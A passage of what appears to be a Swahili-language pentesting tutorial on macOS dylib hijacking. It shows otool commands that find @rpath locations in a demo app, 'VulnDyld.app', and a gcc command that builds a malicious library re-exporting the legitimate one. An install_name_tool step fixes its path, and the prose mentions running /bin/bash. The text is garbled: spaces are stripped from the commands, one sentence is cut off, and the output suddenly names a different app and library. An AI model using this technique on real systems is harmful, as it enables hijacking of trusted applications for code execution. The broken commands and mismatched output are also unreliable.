# Check where are the @rpath locationsotool-l"/Applications/VulnDyld.app/Contents/Resources/lib/binary"|grepLC_RPATH-A2cmdLC_RPATHcmdsize32path@loader_path/. (offset 12)--cmdLC_RPATHcmdsize32path@loader_path/../lib2 (offset 12)
# Check librareis loaded using @rapth and the used versionsotool-l"/Applications/VulnDyld.app/Contents/Resources/lib/binary"|grep"@rpath"-A3name@rpath/lib.dylib (offset 24)time stamp 2 Thu Jan 1 01:00:02 1970currentversion1.0.0compatibilityversion1.0.0# Check the versions
Kwa taarifa zilizopita, tunajua kwamba haichunguzi saini ya maktaba zilizopakiwa na inajaribu kupakia maktaba kutoka:
Hivyo, inawezekana kuiteka! Unda maktaba ambayo inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:
gcc-dynamiclib-current_version1.0-compatibility_version1.0-frameworkFoundation/tmp/lib.m-Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib"-o"/tmp/lib.dylib"# Note the versions and the reexport
Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:
#Check relativeotool-l/tmp/lib.dylib|grepREEXPORT-A2cmdLC_REEXPORT_DYLIBcmdsize48name@rpath/libjli.dylib (offset 24)#Change the location of the library absolute to absolute pathinstall_name_tool-change@rpath/lib.dylib"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib"/tmp/lib.dylib# Check againotool-l/tmp/lib.dylib|grepREEXPORT-A2cmdLC_REEXPORT_DYLIBcmdsize128name/Applications/BurpSuiteProfessional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kujua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa /bin/bash).